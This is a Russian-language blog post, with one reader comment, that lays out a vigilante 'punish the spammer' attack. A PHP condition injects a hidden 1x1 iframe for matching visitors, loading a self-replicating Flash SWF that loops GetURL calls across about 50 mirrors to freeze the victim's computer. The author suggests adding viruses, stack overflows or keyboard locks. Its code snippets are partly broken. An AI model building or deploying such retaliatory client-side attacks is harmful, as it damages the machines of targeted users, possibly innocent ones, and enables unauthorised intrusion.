Как наказать СПАМера?

Зачастую почти все СПАМеры пользуются анонимными proxy-cерверами. Но речь в этом рассказе пойдёт про чуваков которые рассылают рекламы в ваши гостевые книги и Форумы или Добавляют комментарий! Тут следует вспомнить про всеми забытый Adobe Flash и исполняемый на стороне клиента файл swf. И так, мы знаем имя, IP, маскируемый под мозиллу браузер и ещё кое-какие параметры! Этого нам достаточно, что бы создать условия атаки! Ведь как говорил классик — «Лучшее средство защиты — это нападение!» Открываем тот php файл где обрабатывается пост (через _POST[»]) и дописываем строку if (isset[$_POST[‘ffff’]]) || $_SERVER[‘REMOTE_ADDR’] || … а в теле { пишем echo(‘<iframe src=https://….ANTISPAM.SWF width=1 height=1></iframe>’); } Всё — запуск готов! Когда все условия совпадут с указанными в ИФЕ — допишется в код строчка с ифреймом в котором отработает SWF-файл! Теперь сам файл. Открываем Флэш — Новый — 25 кадров — 3кейфрейма. 1ый: play(); 2ой: GetURL(»https://xxxxxx/…ANTISPAM.SWF», _blank, GET); и ещё 50 строк с иным доменомем, но тем же файлом ; 3ий: goToAndPlay(1); — в Public setting убираем menu, делаем playback on fist frame, компилим и записываем по ftp себе на адрес! А дальше, ещё на 5-10 адресов кладём ЕГО ЖЕ! Теперь, через iframe он будет загружать сам себя и сам себя, и иные с 50-адресов, тоже сами себя и сами в себя. Получится (ddos) ddoc(computer)! атака на стороне Клиента! В чём преимущества: нельзя остановить сценарий по Esc, невидим, бесконечно цикличен, самостоятелен, вешает комп и ядро explorer — и при наличие некоторых доработок в него можно вложить и вирус, и переполнение стека и блокировку клавиатуры и прочее, т.к. в своём теле файл может выполнять конструкции JavaScript типа GetURL(‘javascript:alert(‘Иди в жопу СПАМЕР!’);»); Так же его можно запускать из командной строки (если он прилинкован в реестре) типа: cmd -> start ANTISPAM.SWF Так что берегись! Тут я выложил демо-версию атаки, которая не принесёт вреда вашему компьютеру! Кроме того, она работает только под «новые» версии Microsoft Internet Explorer! (Не под Мозиллу и Оперу — другие не проверял, может и работает! Ну а если у чела СПАМера «всё на автомате» — ВИСЯК с перезагрузкой гарантирован!) Безусловно, про Flash как инструмент программисты совсем забыли!

One thought on “Как наказать СПАМера?

  1. спамер надоел своими письмамиа его э- меил неправельный, в поисковике не определяет его никак,провайдер укр телеком,как его наказать..
    «edneyrichard» вот с этой почты пришло письмо

Comments are closed.